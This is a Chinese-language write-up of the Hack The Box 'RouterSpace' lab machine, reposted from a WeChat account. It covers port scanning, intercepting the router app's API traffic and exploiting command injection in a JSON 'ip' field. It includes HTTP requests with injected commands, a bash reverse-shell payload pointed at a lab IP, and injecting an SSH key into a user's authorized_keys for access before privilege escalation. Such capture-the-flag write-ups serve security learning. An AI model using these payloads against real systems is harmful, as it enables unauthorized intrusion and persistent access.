hacktheboxRouterSpace writeup

admin 2022年4月20日03:12:03评论183 views字数 2767阅读9分13秒阅读模式


一、信息收集

0x01 端口扫描

nmap -sS -sV -O 10.10.11.148

hackthebox--RouterSpace writeup

0x02 访问web服务

hackthebox--RouterSpace writeup

发现是一个路由器,进行目录爆破。

0x03 目录爆破

hackthebox--RouterSpace writeup

很遗憾,没有发现有用的目录。

0x04 下载app

hackthebox--RouterSpace writeup

0x05 抓取app的数据包

hackthebox--RouterSpace writeup

hackthebox--RouterSpace writeup

但是没有返回包,进行IP和域名绑定。

0x06 绑定域名

vi /etc/hosts10.10.11.148    routerspace.htb

hackthebox--RouterSpace writeup

0x07 进行抓包

注意:这块有一个小tips,由于我是在MAC电脑上使用模拟器进行抓包,但是如果直接在VPN中抓包是不能获取到返回包的,因此需要在本地进行一次端口转发。

如下:

ew_MacOS -s ssocksd -l 6666

hackthebox--RouterSpace writeup

然后在brup中进行配置

hackthebox--RouterSpace writeup

然后就可以抓到返回包了

hackthebox--RouterSpace writeup

0x08 执行命令


POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 23Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate
{"ip":"0.0.0.0|whoami"}

hackthebox--RouterSpace writeup

但是有些命令不能执行,如ifconfig等。

0x09 尝试反弹shell

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 71Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate
{"ip":"0.0.0.0|bash -c 'exec bash -i &>/dev/tcp/10.10.14.43/4444 <&1'"}

hackthebox--RouterSpace writeup

无法反弹shell

0x10 写入公钥

(1):生成公钥

选择默认即可

ssh-keygen

hackthebox--RouterSpace writeup

(2):将id_rsa.pub的内容保存为authorized_keys

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 71Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate
{"ip":"0.0.0.0|echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDO/6c27YdZ4odas9oIrYo8i6V84BPhrAzuXGvRKW+62sB9U5tHt2unGOBBpt5r487/xP8YAqKGbpOcCMiOoZKMwQ5seyBEDrcoopXQ41F6V2UHDzQErZd/NwT5jLCgkELBikm3VGEWt4c/5GzrtKZSX+tzGTi9SUym+HKHxNOtWFzzNEbGuZWitlMDdlvfMH0oIGCO5W26pGKD60Xn6egLXItAsSmSmjqQgVtUjk3i1Krrd5jGeDlymHjc1wdKX9Gz70UQGMsZd1hRnrQQ5qSUlx0UibTEcsC758SlI8hyrt4cbRWcvGwn9zmMfg4eT9A9cpzGwR0AVh9J71ymMXaP6rIObR7h+3BDeASZZ8Bils4LNypuLDbQd5L3Y0iJ3MZpZtqRrHIeUQei49jluS5ERVXpt65hiG2oyO8lfrqOJYt4RX5nH9AGr/E3uoIz0fZETIm1JlgYdEsnoViySBMexfAc6EcLl8IugNBQSKwbPJtni+G8kE+Q4h5WX4JEhg0= root@kali2020' > /home/paul/.ssh/authorized_keys"}

hackthebox--RouterSpace writeup

(3):赋予700权限

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 71Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate
{"ip":"0.0.0.0|chmod 700 /home/paul/.ssh/authorized_keys"}

hackthebox--RouterSpace writeup

二、获取权限

0x01 进行登陆

ssh [email protected] -i id_rsa

hackthebox--RouterSpace writeup

三、权限提升

0x01 使用整理的提权方法进行尝试

提权总结链接:https://github.com/wwl012345/Vuln-List/blob/main/Windows&Linux%E6%8F%90%E6%9D%83%E5%90%88%E9%9B%86.md

(1):从本地拷贝exp

scp local_file remote_username@remote_ip:remote_folder

hackthebox--RouterSpace writeup

(2):进行提权

hackthebox--RouterSpace writeup

四、复盘

0x01 下载apk

0x02 然后抓取数据包

0x03 进行命令拼接

0x04 使用ssh写入公钥

0x05 进行权限提升



原文始发于微信公众号(想走安全的小白):hackthebox--RouterSpace writeup

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日03:12:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   hacktheboxRouterSpace writeuphttps://cn-sec.com/archives/920623.html

发表评论

匿名网友 填写信息